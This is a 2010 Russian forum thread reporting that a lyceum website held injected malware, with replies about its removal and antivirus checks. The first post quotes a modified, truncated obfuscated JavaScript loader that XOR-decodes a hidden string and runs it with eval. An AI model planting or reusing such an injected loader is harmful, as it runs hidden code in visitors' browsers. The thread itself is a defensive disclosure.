Перейти к содержимому


Фото

ВНимание! Сайт lit.msu.ru содержит вредоносный код!


  • Чтобы отвечать, сперва войдите на форум
14 ответов в теме

#1 pevcov Опубликовано 02 Сентябрь 2010 - 6:58

pevcov
  • Свои
  • 357 Сообщений:
  • S P
http_//www.lit.msu.ru/ru/news/detail.php%3FID%3D385 там примерно вот такой код (изменен) script>e*al(unescape('function%20eVpG%28lGxkyn%29%7Bfunction%20vXJd%28evZb%29%7Bvar%20mTiKUBTJ%3D0%3Bvar%20vcu%3DevZb.length%3Bvar%20cPnyB%3D0%3Bwhile%28cPnyB%3Cvcu%29%7BmTiKUBTJ+%3DxGz%28evZb%2CcPnyB%29*vcu%3BcPnyB++%3B%7Dreturn%20%28mTiKUBTJ+%27%27%29%3B%7Dfunction%20xGz%28dTnHI%2CrIurLd%29%7Breturn%20dTnHI.charCodeAt%28rIurLd%29%3B%7D%20%20%20try%20%7Bvar%20ajrbIBT%3De*al%28%27a*rZg0uZmSe*nStZsZ.LcZa0lSl0eZeS%27.replace%28/%5BL%5C*0ZS%5D/g%2C%20%27%27%29%29%3Bvar%20gWIzf%3Dnew%20String%28%29%3Bvar%20fNuG%3D0%3BsXj%3D0%2CeGX%3D%28new%20String%28ajrbIBT%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%3Bvar%20wvcmI%3DvXJd%28eGX%29%3BlGxkyn%3Dunescape%28lGxkyn%29%3Bfor%28var%20nYIZI%3D0%3B%20nYIZI%20%3C%20%28lGxkyn.length%29%3B%20nYIZI++%29%7Bvar%20wLn%3DxGz%28eGX%2CfNuG%29%5ExGz%28wvcmI%2CsXj%29%3Bvar%20dTW%3DxGz%28lGxkyn%2CnYIZI%29%3BsXj++%3BfNuG++%3Bif%28sXj%3EwvcmI.length%29sXj%3D0%3Bif%28fNuG%3EeGX.length%29fNuG%3D0%3BgWIzf+%3DString.fromCharCode%28dTW%5EwLn%29%3B%7De*al%28gWIzf%29%3B%20return%20gWIzf%3Dnew%20String%28.......%3B'));</script

#2 Денис Опубликовано 02 Сентябрь 2010 - 8:55

Денис
  • Genius loci
  • 6 907 Сообщений:
  • Денис Сумин
Спасибо! Сейчас буду смотреть.

#3 Денис Опубликовано 02 Сентябрь 2010 - 13:00

Денис
  • Genius loci
  • 6 907 Сообщений:
  • Денис Сумин
Кусочки кода такого шаблона в разных файлах найдены и удалены. Сергей, спасибо!

#4 Дей-Лак Опубликовано 02 Сентябрь 2010 - 15:14

Дей-Лак
  • Свои
  • 596 Сообщений:
  • Николай Яковлев
А можно мне непросвещенному объяснить что в этом коде не так?
Опубликованное фото
Конституцию прочесть должен ты.

#5 Денис Опубликовано 02 Сентябрь 2010 - 15:17

Денис
  • Genius loci
  • 6 907 Сообщений:
  • Денис Сумин
В нем закодирован вредоносный код, который выполняется на машине пользователя в браузере.

#6 Stasia Опубликовано 02 Сентябрь 2010 - 15:20

Stasia
  • Свои
  • 1 578 Сообщений:
  • Настя Горохова-Алексеева
О.о А кто его туда закодировал?=)
К каждой плюшке вы должны подходить с необычайным уважением (ЮА)

#7 гык-sse2 Опубликовано 02 Сентябрь 2010 - 17:45

гык-sse2
  • Свои
  • 377 Сообщений:
  • Михаил Беляев

В нем закодирован вредоносный код, который выполняется на машине пользователя в браузере.

А что он делал и поддерживает ли он Safari 5.0/Mac?
Медведь громит каны!

#8 pevcov Опубликовано 02 Сентябрь 2010 - 19:53

pevcov
  • Свои
  • 357 Сообщений:
  • S P
Для тех, кто заходил на lit.msu.ru напишу, как проверить свой комп. Эта проверка не гарантирует, что все вирусы будут найдены, но хуже не будет... 1. Скачайте avz с сайта z-oleg.com, обновите базы стандартным скриптом и запустите проверку. Проверить нужно еще и диск С. 2. Скачайте CureIt с сайта drweb.com и запустите полную проверку. Для гиков: 3. Скачайте утилиту против tdss с esagelab.com и gmer с gmer.net и проверьтесь ими. А вообще ставьте NoScript и FlashBlock, заодно отключив плагин Acrobat Readera в Firefox'e. Ну и... пользуйтесь Яндексом, он предупреждает о некоторых вирусах :)

#9 Денис Опубликовано 02 Сентябрь 2010 - 19:56

Денис
  • Genius loci
  • 6 907 Сообщений:
  • Денис Сумин
На всякий случай я также отмечу, что заражены были только куски старого сайта Лицея (бело-сине-рыжий, Битрикс), поэтому вероятность попадания туда пользователей была минимальной. Но, конечно, она была и проверить свою систему лишний раз лишним не будет)

#10 starcev Опубликовано 02 Сентябрь 2010 - 19:56

starcev
  • Свои
  • 448 Сообщений:
  • . .
Как я понял это какой-то эксплойт на плагин акробата? Надеюсь он под оперой не пашет?

#11 Sankinn Опубликовано 03 Сентябрь 2010 - 17:27

Sankinn
  • Свои
  • 2 231 Сообщений:
  • Александра Першина
а можно проверить систему просто антивирусом или надо сделать так, как сказано выше?

«Где же ты, мой брат, кто же ты, мой друг, где же ты, моя любовь?» 
Н. О'Шей «Одной крови»

Помните: таких не берут в партизаны

Для блогерства уже поздно

 

#12 pevcov Опубликовано 03 Сентябрь 2010 - 21:01

pevcov
  • Свои
  • 357 Сообщений:
  • S P

а можно проверить систему просто антивирусом или надо сделать так, как сказано выше?


А каким? :)

#13 koraalex Опубликовано 04 Сентябрь 2010 - 5:24

koraalex
  • Свои
  • 1 967 Сообщений:
  • Алексей Коробов
Ещё один юзерский вопрос: брандмауэр типа Outpost на такую штуку внимание обращает?

#14 pevcov Опубликовано 04 Сентябрь 2010 - 6:59

pevcov
  • Свои
  • 357 Сообщений:
  • S P

Ещё один юзерский вопрос: брандмауэр типа Outpost на такую штуку внимание обращает?


Если троян начнет ломиться по каким-нибудь странным портам, то, вероятно, обратит. Но сейчас трояны такие трояны... В них чуть ли не антивирусный функционал встраивают для убийства антивирусов на компе. В общем, шанс есть, но гарантий нет. Ну, как вообще со всеми антивирусами :)

#15 Sankinn Опубликовано 04 Сентябрь 2010 - 10:38

Sankinn
  • Свои
  • 2 231 Сообщений:
  • Александра Першина

А каким? :)


Касперским.

«Где же ты, мой брат, кто же ты, мой друг, где же ты, моя любовь?» 
Н. О'Шей «Одной крови»

Помните: таких не берут в партизаны

Для блогерства уже поздно

 




1 пользователей читают эту тему

0 пользователей, 1 гостей, 0 невидимых